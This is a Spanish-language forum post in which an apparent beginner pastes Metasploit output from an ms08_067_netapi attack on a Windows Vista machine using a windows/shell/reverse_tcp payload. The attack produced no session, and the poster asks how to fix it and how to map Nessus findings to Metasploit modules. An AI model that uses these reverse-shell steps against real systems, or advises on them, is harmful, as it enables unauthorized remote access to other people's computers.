] Started reverse handler on 192.168.1.33:4444 
-  Automatically detecting the target...
-  Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown
-  Could not determine the exact language pack
-  Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > 
creo q ya he avanzado bastante 

:D  aunq estoy muy perdido aun...
segun me han dicho exploto bien  pero no se porque razon  no creo una sesion...
pero segui el tutorial ese  y consegui esto.
como lo puedo solucionar¿?¿  
utilice el   set PAYLOAD windows/shell/reverse_tcp
si utilizo otros  puede darme mejores resultados?¿?¡
otra cosa , haciendo el escaner con nessus  me dio 14 vulnerabilidades   entre ellas el puerto  445  q es la q intente hacer,  pero si queiro probar otras  como se q utilizar en metasploit¿?¿   MEDIENTA  LA   ID¿?¿?¡     algun sitio q de informacion de esto¿?¡
mil gracias de nuevo